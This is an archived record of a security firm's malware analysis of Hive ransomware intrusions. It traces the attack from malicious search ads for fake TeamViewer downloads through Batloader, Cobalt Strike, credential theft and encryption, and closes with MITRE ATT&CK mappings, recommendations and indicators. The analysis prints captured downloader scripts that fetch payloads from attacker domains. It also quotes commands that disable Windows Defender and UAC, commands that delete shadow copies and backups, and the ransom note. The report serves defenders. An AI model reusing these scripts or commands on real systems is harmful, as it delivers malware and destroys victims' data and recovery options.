{
	"id": "a37752be-72e5-440b-ae69-799369a5d287",
	"created_at": "2026-04-06T00:20:55.703283Z",
	"updated_at": "2026-04-10T03:21:25.673375Z",
	"deleted_at": null,
	"sha1_hash": "61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb",
	"title": "Hive Ransomware Technical Analysis and Initial Access Discovery",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1916539,
	"plain_text": "Hive Ransomware Technical Analysis and Initial Access Discovery\r\nPublished: 2023-02-02 · Archived: 2026-04-05 16:35:00 UTC\r\nHive has been seized by law enforcement, but we're likely to still see these initial access methods and tactics used\r\nacross other threat actor groups.\r\nKroll has observed an increase in Hive ransomware incidents across a wide range of industry verticals. A new\r\ntrend of initial infection vector (IIV) has been identified by Kroll analysts that may relate to the increase of\r\nactivity and the varying nature of targets. Across a number of incidents, the IIV was attributed to IT administrators\r\nlooking to download common software from Google such as TeamViewer, Zoom and AnyDesk, and they were\r\nprovided with advertisements for these tools at the top of their search results. We recently reported on this trend,\r\nwhere threat actors were abusing Google Ads to deploy malware via downloads.\r\nWhen these IT administrators downloaded the desired “tools” from the malicious ad links, Batloader was also\r\nunknowingly delivered. Batloader is an initial access malware utilized to deliver tools such as Zloader, Ursnif and\r\nVidar to further establish the threat actor’s foothold within a network. Cobalt Strike can then be installed to\r\nmaintain command and control. Once the threat actor has acquired credentials and identified sensitive files for\r\nexfiltration, they are able to utilize common exfiltration tools such as WinSCP and Rclone to extract a victim’s\r\ndata. 
The ransomware binary is then executed with a specific identifiable encryption key and this is used to create\r\nthe ransom note named “HOW_TO_DECRYPT.txt” and appends a specific file extension related to a dropped key\r\nfile within the root of C:\\.\r\nA login is provided for the victim to access the Hive “Sales Department” onion site, and if demands are not met,\r\ndata is then shared on their “Hive Leak” onion site.\r\nTimeline of Incident\r\nInitial Exploit\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 1 of 13\n\nIn a recent case, after the IT administrator searched for TeamViewer and clicked the advertisement link, they were\r\ndirected to https://caroseyama[.]xyz/9hjLXZR?https://www.teamviewer[.]com/en/customer-support. This link then\r\nredirected to https://teamviewclouds[.]com/index.php. Our experts analyzed the teamviewclouds domain and\r\nidentified a large number of similar typosquatted domains for a wide range of common software hosted on the\r\nsame IP address and hosted by regprivate[.]ru.    Most of these domains were inactive, which suggests that the\r\nthreat actors are continually creating new advertisements. An installation file is then provided from\r\nhttps://dc444.4sync[.]com/download/fXx-c_iZ/InstallerV36__218_.zip, which is the Batloader .msi file. The file\r\nsharing provider 4sync has been identified across separate Batloader incidents and appears to serve the Batloader\r\n.msi download.\r\nzoomyclouds[.]com, zoomedes[.]com, zohosz[.]com, teamviewerq[.]com, teamviewer-cloudcomputing[.]com, teamviewcl\r\nFigure 1: Example of Typosquatted domains associated with teamviewclouds[.]com\r\nThe installer itself installed novaPDF by Softland rather than TeamViewer and dropped PowerShell scripts\r\n“scrED95.ps1” and “pssEDC6.ps1”. “pssEDC6.ps1” is a conversion script that creates the initial downloader\r\nscript “scrED95.ps1”. 
This script downloads the initial Batloader script “update.bat” and sets the working\r\ndirectory to the user’s appdata local directory. The scripts are executed by PowerShell as shown in figure 2.\r\npowershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File \"C:\\Users\\user\\AppData\\Local\\Temp\\pssED\r\nFigure 2: PowerShell command to create initial downloader\r\nSet-Location \"$Env:USERPROFILE\\AppData\\Roaming\"\r\nInvoke-RestMethod -Uri https://cloudupdatesss[.]com/g5i0nq/index/e6a5614c379561c94004c531781ee1c5/?servername=ms\r\nStart-Process -WindowStyle hidden -FilePath \"$Env:USERPROFILE\\AppData\\Roaming\\update.bat\r\nFigure 3: scrED95.ps1\r\nMITRE ATT\u0026CK: T1583.001: Acquire Domain Names\r\nMITRE ATT\u0026CK: T1608.004: Stage Capabilities - Drive-by Target\r\nMITRE ATT\u0026CK: T1588: Obtain Capabilities\r\nMITRE ATT\u0026CK: T1189: Drive-by Compromise\r\nToolkit Deployment and Escalation\r\nTo maintain persistence and to gain increased privileges, Hive actors leverage Batloader to download Ursnif and\r\nVidar, but also attempt to gain the highest privileges possible to install the malware. 
The initial Batloader script\r\ndownloads “requestadmin.bat” and attempts to execute it with elevated privileges by nircmd.exe.\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/f69af5bc8498d0ebeb37b801d450c046/?server\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/c003996958c731652178c7113ad768b7/?servern\r\ncmd /c nircmd elevatecmd exec hide \"requestadmin.bat\"\r\nping 127.0.0.1 -n 20\r\nFigure 4: update.bat\r\nThe “requestadmin.bat” then attempts to download further scripts named “runanddelete.bat” and “scripttodo.ps1”.\r\nThe script itself also attempts to whitelist specific paths from Windows Defender before downloading Nsudo.exe.\r\nNsudo provides capabilities to execute binaries with elevated privileges, which are then used to edit the system\r\nregistry to disable the user access control prompt and to disable task manager and other registry tools. 
The\r\nWindows power system settings tool Powercfg is then executed to disable sleep, which will allow the threat actor\r\nto maintain persistent access.\r\nset pop=%systemroot%\r\ncd %APPDATA%\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/a3874ddb552a5b45cade5a2700d15587/?servern\r\ncd %APPDATA%\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/fa777fbbb8f055cb8bfcba6cb41c62e7/?servern\r\nstart /b PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\u0026 './scripttodo.ps1'\"\r\ndel nircmd.exe\r\ncmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -Exclus\r\ncmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -Exclus\r\n--- \u003csnip\u003e ---\r\npowershell Invoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.e\r\nset pop=%systemroot%\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Co\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\" /v\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"N\r\npowercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800\r\npowercfg -change -standby-timeout-dc 3000\r\npowercfg -change -standby-timeout-ac 3000\r\nstart /b \"\" cmd /c del \"%~f0\"\u0026exit /b\r\nFigure 5: requestadmin.bat\r\nThe script “runanddelete.bat” appears to be a 
modified open-source script named “get-admin.bat”. This script\r\nattempts to spawn the user access control prompt to gain the increased privileges to then spawn an Administrator\r\nshell, via a created file named “getadmin.vbs”. Once increased privileges are achieved, it then attempts to run\r\nUrsnif (d2ef5.exe). Ursnif can be used to extract system information and seek to steal user credentials.\r\n@echo off\r\ntitle Installing Packages\r\n:: BatchGotAdmin\r\n::-------------------------------------\r\nREM --\u003e Check for permissions\r\n\u003enul 2\u003e\u00261 \"%SYSTEMROOT%\\system32\\cacls.exe\" \"%SYSTEMROOT%\\system32\\config\\system\"\r\nREM --\u003e If error flag set, we do not have admin.\r\nif '%errorlevel%' NEQ '0' (\r\n echo Requesting administrative privileges...\r\n goto UACPrompt\r\n) else ( goto gotAdmin )\r\n:UACPrompt\r\n echo Set UAC = CreateObject^(\"Shell.Application\"^) \u003e \"%temp%\\getadmin.vbs\"\r\n set params = %*:\"=\"\r\n echo UAC.ShellExecute \"cmd.exe\", \"/c %~s0 %params%\", \"\", \"runas\", 0 \u003e\u003e \"%temp%\\getadmin.vbs\"\r\n \"%temp%\\getadmin.vbs\"\r\n del \"%temp%\\getadmin.vbs\"\r\n exit /B\r\n:gotAdmin\r\necho Installing Necessary Packages.....Please Wait.....\r\ncd %APPDATA%\r\nstart /b d2ef5.exe\r\nFigure 6: runanddelete.bat\r\nThe script “scripttodo.ps1” initially installs GNU Privacy Guard for Windows (“Gpg4Win”), which is a file\r\nencryption software. Vidar binaries are then downloaded and decrypted by Gpg4Win along with a further attempt\r\nto download Nsudo.exe. The Vidar binaries are then executed, likely in an attempt to further gather system\r\ninformation and to gather credentials. 
The script also creates exclusions in the registry to prevent Windows\r\nDefender alerting on execution.\r\nparam\r\n(\r\n[Parameter(Mandatory)]\r\n[ValidateNotNullOrEmpty()]\r\n[string]$DownloadFolderPath,\r\n[Parameter()]\r\n[ValidateNotNullOrEmpty()]\r\n[string]$DownloadUrl = 'http://files.gpg4win[.]org/gpg4win-2.2.5.exe'\r\n)\r\n--- \u003csnip\u003e ---\r\nif ($Condition_All )\r\n{\r\n $URL = \"https://cloudupdatesss[.]com/t1mw0r/index/d2ef590c0310838490561a205469713d/?servername=msi\u0026arp=\"+ $I\r\n $URL1 = \"https://cloudupdatesss[.]com/t1mw0r/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi\u0026arp=\"+ $I\r\n $URL2 = \"https://cloudupdatesss[.]com/t1mw0r/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi\u0026arp=\"+ $I\r\nInvoke-WebRequest $URL -outfile p9d2s.exe.gpg\r\nInvoke-WebRequest $URL1 -outfile p9d2.bat\r\nInvoke-WebRequest $URL2 -outfile ata.exe.gpg\r\n}\r\n--- \u003csnip\u003e ---\r\nRemove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n$uri = 'https://raw.githubusercontent.com/adbertram/Random-PowerShell-Work/master/Security/GnuPg.psm1'\r\n$moduleFolderPath = 'C:\\Program Files\\WindowsPowerShell\\Modules\\GnuPg'\r\n$null = New-Item -Path $moduleFolderPath -Type Directory\r\nInvoke-WebRequest -Uri $uri -OutFile (Join-Path -Path $moduleFolderPath -ChildPath 'GnuPg.psm1')\r\n$env:APPDATA\r\nInstall-GnuPG -DownloadFolderPath $env:APPDATA\r\necho \"START\"\r\nAdd-MpPreference -ExclusionExtension “exe”\r\nAdd-MpPreference -ExclusionExtension “dll”\r\nRemove-Encryption -FolderPath $env:APPDATA -Password '105b'\r\nInvoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe 
-outfile\r\n.\\p9d2s.exe\r\n.\\ata.exe\r\n.\\p9d2.bat\r\nFigure 7: scripttodo.ps1 snippets\r\nMITRE ATT\u0026CK: T1059: Command and Scripting Interpreter\r\nMITRE ATT\u0026CK: T1064: Scripting\r\nMITRE ATT\u0026CK: T1548.002: Bypass User Account Control\r\nMITRE ATT\u0026CK: T1222: File and Directory Permissions Modification\r\nMITRE ATT\u0026CK: T1583.001: Acquire Domain Names\r\nMITRE ATT\u0026CK: T1027: Obfuscated Files\r\nMITRE ATT\u0026CK: T1056: Input Capture\r\nThe post-exploitation tool Cobalt Strike is often leveraged to provide command and control, utilizing both HTTP\r\nand SMB beacons to move laterally and report back to the threat actor’s infrastructure.\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 45000,\r\n \"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"softeruplive[.]com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n--- \u003cSNIP\u003e ---\r\nFigure 8: Cobalt Strike HTTP beacon\r\nMITRE ATT\u0026CK: T1001: Data Obfuscation\r\nMITRE ATT\u0026CK: T1573.001: Encrypted Channel: Symmetric Cryptography\r\nIf required, the threat actors have also used minidump and ProcDump to dump the LSASS process. This is likely\r\nan attempt to dump NTLM credential hashes for password cracking, or for pass the hash techniques. PowerSploit\r\nhas also been identified with attempts to run “Invoke-Kerberoast” to gain Kerberos ticket hashes for service\r\naccounts. 
This would likely provide the threat actor with increased privileges or access if successful.\r\nMITRE ATT\u0026CK: T1003.001: Credential Dumping – LSASS Memory\r\nMITRE ATT\u0026CK: T1558.003: Kerberoasting\r\nMITRE ATT\u0026CK: T1550: Use Alternate Authentication Material\r\nCommon remote access software such as Splashtop can be installed via Cobalt Strike to provide persistent,\r\nseemingly legitimate access to the network. This also allows the threat actor to conduct hands-on operations.\r\nRemote Desktop Protocol (RDP) is used with legitimate accounts to navigate across the network.\r\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nMITRE ATT\u0026CK: T1021: Remote Services\r\nInternal Scouting\r\nOnce the threat actor gains a foothold within the network, Kroll has observed the use of tools such as ADFind to\r\nidentify accounts and servers. Other common tools such as nslookup and whoami have also been used to gain\r\ninitial system information.\r\nThe Exchange PowerShell module Get-DomainController has also been identified when leveraging Cobalt Strike\r\nto execute commands. This module provides information on the domain controller for the local domain.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbA\r\n---Decoded Base64 string---\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:7572/'); Get-DomainController\r\nFigure 9: Example of Cobalt Strike commands\r\nMITRE ATT\u0026CK: T1482: Domain Trust Discovery\r\nMITRE ATT\u0026CK: T1087: Account Discovery\r\nMITRE ATT\u0026CK: T1016: System Network Configuration Discovery\r\nMission Execution\r\nThe threat actors look to identify sensitive files for exfiltration before encrypting devices by using tools such as\r\nRclone to automate data extraction to cloud storage. 
Kroll has observed that threat actors have searched for files\r\nusing PowerShell and manual traversal across files.\r\nMITRE ATT\u0026CK: T1005: Data from Local System\r\nMITRE ATT\u0026CK: T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nMITRE ATT\u0026CK: T1020: Automate Exfiltration\r\nTo push the ransomware binary across the network, the Sysinternals tool PsExec has been leveraged as well as\r\ncustom scripts to deploy the encryptor. The ransomware binary itself appears to come in both 64- and 32-bit\r\nversions. To encrypt, the binary requires the login and password: “.\\windows_x64_encrypt.exe -u login:password”.\r\nThere are other options available for file encryption including:\r\n-local-only: Encrypt only local files.\r\n-no-discovery: Do not look for network shares.\r\n-explicit-only: Encrypt specific directories.\r\nBy default, the binary prevents recovery by deleting volume shadow copies with “vssadmin.exe delete shadows /all\r\n/quiet” and deletes system backups with “wbadmin.exe delete systemstatebackup” and “wbadmin.exe delete\r\ncatalog -quiet” before preventing recovery from boot with “bcdedit.exe /set {default} recoveryenabled No” and\r\n“bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures”. The binary encrypts files, except for “.lnk” files\r\nand binaries within “C:\\windows”, before generating two key files in the root of C:\\. 
The key files also determine\r\nthe extension string added to the encrypted files along with a base64 encoded pointer.\r\nYour network has been breached and all data were encrypted.\r\nPersonal data, financial reports and important documents are ready to disclose.\r\nTo decrypt all the data and to prevent exfiltrated files to be disclosed at\r\nhttp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd[.]onion/\r\nyou will need to purchase our decryption software.\r\n \r\nPlease contact our sales department at:\r\n \r\n http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd[.]onion/\r\n \r\n Login: \u003credacted\u003e\r\n Password: \u003credacted\u003e\r\n \r\nTo get an access to .onion websites download and install Tor Browser at:\r\n https://www.torproject[.]org/ (Tor Browser is not related to us)\r\n \r\n \r\nFollow the guidelines below to avoid losing your data:\r\n \r\n - Do not modify, rename or delete *.key files. Your data will be\r\n undecryptable.\r\n - Do not modify or rename encrypted files. You will lose them.\r\n - Do not report to the Police, FBI, etc. They don't care about your business.\r\n They simply won't allow you to pay. As a result you will lose everything.\r\n - Do not hire a recovery company. They can't decrypt without the key.\r\n They also don't care about your business. They believe that they are\r\n good negotiators, but it is not. They usually fail. So speak for yourself.\r\n - Do not reject to purchase. Exfiltrated files will be publicly disclosed.\r\nFigure 10: HOW_TO_DECRYPT.txt\r\nMITRE ATT\u0026CK: T1570 : Lateral Tool Transfer\r\nMITRE ATT\u0026CK: T1490 : Inhibit System Recovery\r\nMITRE ATT\u0026CK: T1486 : Data Encrypted for Impact\r\nOnce data has been extracted and encrypted, victims are directed to their customer page to negotiate the ransom\r\nfee. 
If a fee is not agreed, then victims could be placed onto their shaming site: “HiveLeaks.”\r\nFigure 11: HiveLeaks Shaming Site\r\nMITRE ATT\u0026CK Mapping\r\nTactic Technique Procedure\r\nTA0042 T1566.002 Acquire Domain Names\r\nTA0042 T1588.001 Obtain Capabilities - Malware\r\nTA0042 T1588.002 Obtain Capabilities - Tool\r\nTA0042 T1608.004 Stage Capabilities - Drive-by Target\r\nTA0001 T1189 Drive-by Compromise\r\nTA0002 T1059 Command and Scripting Interpreter\r\nTA0002 T1064 Scripting\r\nTA0002 T1204 User Execution\r\nTA0002 T1072 Software Deployment Tools\r\nTA0003 T1078 Valid Accounts\r\nTA0003 T1543.003 Create or Modify System Process - Windows Service\r\nTA0004 T1548.002 Bypass User Account Control\r\nTA0004 T1134 Access Token Manipulation\r\nTA0005 T1548.002 Bypass User Account Control\r\nTA0005 T1222 File and Directory Permissions Modification\r\nTA0005 T1070 Indicator Removal\r\nTA0005 T1027 Obfuscated Files\r\nTA0005 T1550 Use Alternate Authentication Material\r\nTA0005 T1078 Valid Accounts\r\nTA0006 T1056 Input Capture\r\nTA0006 T1003.001 Credential Dumping - LSASS Memory\r\nTA0006 T1558.003 Steal or Forge Kerberos Tickets - Kerberoasting\r\nTA0007 T1482 Domain Trust Discovery\r\nTA0007 T1087 Account Discovery\r\nTA0007 T1016 System Network Configuration Discovery\r\nTA0008 T1021 Remote Services\r\nTA0008 T1570 Lateral Tool Transfer\r\nTA0009 T1005 Data from Local System\r\nTA0011 T1219 Remote Access Software\r\nTA0011 T1573.001 Encrypted Channel: Symmetric Cryptography\r\nTA0011 T1001 Data Obfuscation\r\nTA0010 T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nTA0010 T1020 Automate Exfiltration\r\nTA0040 T1490 Inhibit System Recovery\r\nTA0040 T1486 Data Encrypted for Impact\r\nRecommendations\r\nKroll has identified recommendations relating to this alert:\r\nRecommendation: Monitor PowerShell execution. Ensure PowerShell is logged, and create detections for encoded script execution.\r\nObservation: The threat actor utilized Cobalt Strike. Monitoring PowerShell execution can identify malicious activity associated with Cobalt Strike.\r\nRecommendation: Enable Credential Guard. Windows Credential Guard can provide protection against password extraction and other authentication attacks.\r\nObservation: The threat actor dumped LSASS and conducted Kerberos attacks. Credential Guard can offer some protection against these attacks.\r\nRecommendation: Audit user, administrator and service accounts. Ensure accounts have the correct access and privileges. Implement the principle of least privilege.\r\nObservation: The threat actor is often able to install tools on user endpoints. Limiting the privileges of users can prevent a threat actor from installing malicious software.\r\nRecommendation: Implement multi-factor authentication. Multi-factor authentication can restrict access to sensitive areas and can prevent lateral movement.\r\nObservation: Enabling multi-factor authentication can prevent a threat actor from moving laterally and accessing sensitive data.\r\nRecommendation: Review backup strategies. Ensure multiple backups are taken and at least one backup is isolated from the network.\r\nObservation: As a ransomware actor’s main aim is to disrupt business, ensuring a viable backup and recovery strategy is in place can allow a business to recover quickly.\r\nRecommendation: Review remote access tools.\r\nObservation: Threat actors leverage legitimate remote access tools to maintain persistence. Ensure remote access is monitored and that only approved remote access tools exist in the environment.\r\nIndicators of Compromise\r\nThe following files and hashes have been identified for the incident:\r\nThe following external IP addresses were observed during the incident:\r\nIP Address Comment\r\n46.30.42[.]56 caroseyama[.]xyz\r\n194.67.119[.]190 cloudupdatesss[.]com\r\n45.8.158[.]104 http://45.8.158[.]104/uploaded\r\n37.140.192[.]70 teamviewclouds[.]com\r\nSource: https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery"
	],
	"report_names": [
		"hive-ransomware-technical-analysis-initial-access-discovery"
	],
	"threat_actors": [],
	"ts_created_at": 1775434855,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.pdf",
		"text": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.txt",
		"img": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.jpg"
	}
}